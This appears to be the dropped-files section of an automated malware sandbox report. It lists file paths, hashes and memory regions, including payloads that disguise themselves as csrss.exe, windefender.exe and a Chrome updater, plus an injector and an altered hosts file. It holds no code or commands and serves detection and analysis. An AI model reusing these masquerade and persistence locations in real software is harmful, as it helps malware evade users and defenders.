C:\Users\Admin\AppData\Local\Temp\9349.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

memory/4344-116-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/4764-117-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4344-118-0x0000000000D60000-0x0000000000DD5000-memory.dmp

memory/4344-119-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/4528-120-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4528-121-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4528-123-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4412-128-0x0000000000330000-0x000000000033C000-memory.dmp

memory/4412-130-0x0000000000340000-0x0000000000347000-memory.dmp

memory/4412-134-0x0000000000330000-0x000000000033C000-memory.dmp

memory/4528-141-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4344-151-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/3956-153-0x0000000002A10000-0x0000000002E0A000-memory.dmp

memory/4508-154-0x00000000055D0000-0x00000000055EC000-memory.dmp

memory/3956-155-0x0000000002E10000-0x00000000036FB000-memory.dmp

memory/3956-156-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4508-157-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-158-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-160-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-162-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-164-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-166-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-168-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-170-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-172-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-174-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-176-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-178-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-180-0x00000000055D0000-0x00000000055E5000-memory.dmp

C:\Users\Admin\AppData\Local\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1216-182-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1216-186-0x0000000074510000-0x0000000074CC0000-memory.dmp

memory/4508-187-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-188-0x0000000005890000-0x00000000058A0000-memory.dmp

memory/4508-189-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4764-191-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1216-193-0x0000000008580000-0x0000000008B98000-memory.dmp

memory/1216-194-0x00000000076B0000-0x00000000076C2000-memory.dmp

memory/1216-195-0x00000000077E0000-0x00000000078EA000-memory.dmp

memory/1216-196-0x0000000007710000-0x000000000774C000-memory.dmp

memory/3956-197-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1216-198-0x0000000007770000-0x00000000077BC000-memory.dmp

memory/3956-200-0x0000000002E10000-0x00000000036FB000-memory.dmp

memory/3956-201-0x0000000002A10000-0x0000000002E0A000-memory.dmp

memory/1972-204-0x0000000002520000-0x00000000025B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/3020-205-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3020-206-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3020-208-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1216-209-0x0000000007FE0000-0x0000000008046000-memory.dmp

memory/3956-210-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1216-212-0x0000000008F20000-0x0000000008F96000-memory.dmp

memory/1216-214-0x0000000008EE0000-0x0000000008EFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tr5gvqvz.grd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3956-234-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4300-236-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Roaming\aidihdd

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/1704-273-0x0000000000CF0000-0x0000000000CFB000-memory.dmp

memory/3056-280-0x0000000000110000-0x000000000011F000-memory.dmp

memory/3260-289-0x0000000000CF0000-0x0000000000CF9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9349.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 4fd6b3a467056385abd8ed1f85da0fa2
SHA1 4c42cd69ac787622af8b0748cb72b76911f9ff76
SHA256 5e9fcb024a6b188bad3226ea736d4b95df2a5cc6b493e0fab951c5bc051fbfec
SHA512 525067ffa8c9ef372255eaf264114971590a64cd06302e33ef89d5465eded3a1579b8b79efa1b445e593fa2cd907ed3394b4f1193c0ed63157ed5f06d4889289

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6738d1984cdb9f3d4136a1dd7c2bb45e
SHA1 1b202fa2af82b1f911275cc51e0fcc0911f8c640
SHA256 b46154e81bff60e4009cb82dd443803d636ea916ddc4e2a63d5f9e5479b348c4
SHA512 a09f1e1e74a376dac5b8f468bc8bf568950b65f3b616410a804751bd49ca676b57e3785d749b9b0cd52406d5490637e95f6b680ec10041bca4a7faf281e17c0b

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6eac15739187cb08cacb633e135bf399
SHA1 00aa8b552395a936f4d3a008887f642905aa90e6
SHA256 85a9bb156b26b663ae389297208c4465843b1e2aaa3f0011f27068b5823f5df6
SHA512 407726a7b90f13cefea78e6890580a008ed54c509fa7f0b785a0bb359cb7b014c699713693c5c7be890cab5bf0cdeafdc5469ef156e38b9a763346dbf08cda08

C:\Windows\rss\csrss.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

C:\Windows\rss\csrss.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

C:\Users\Admin\AppData\Local\Temp\kyabiylzsfjo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Program Files\Google\Chrome\updater.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e808d6a69b8499dcb5b789ca516b5e10
SHA1 b4f3f350552578169c8f72ec8662104f6f98d58e
SHA256 23e7333a37381a96709a2691ef61c88fb74eb5f33753efd46cefd099c7172f5b
SHA512 8b858275b8326f575377a2b4407e8521450c2247dfc8951c3288255f4391374ab0a2001aab6d4e57c403353b04fde5bab1359a0e2ce2a6d4a2a8c37db1aee125

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ba2b24184850e288fa62f8a3bc5fc523
SHA1 3ff977e1c25e0095fad9d4ea194e56151c793483
SHA256 2cae7fd256ae3088d4efb1c7f3d721f9962938e89823815a66f3202969097ff1
SHA512 b015c6a9bbaf10b307fd7b00b61bc257ffd4f82241184abcc96062da178dc61740fb97d42ad15c61ecc1a56511a28afb24bdad3704203a8470ecf496af8b1f49

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7c3bdd849e4f8a2070e78062bb1548eb
SHA1 53b8151fc5403b5c285ae8a68254a733fadc1ef6
SHA256 6eb8564491e2603067269bfc6fd63e242536faf5bd989e310528bbbcc0ee2633
SHA512 ff08b261629fd8a2a03273679ac6ca367f128e8ba8a9144fdc77df4eec156ae98861b44c3ab95a8e250f06b5f07edf27affe4e2a17d1065fc039cc20e5e9309e

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\TEMP\kyabiylzsfjo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Program Files\Google\Chrome\updater.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4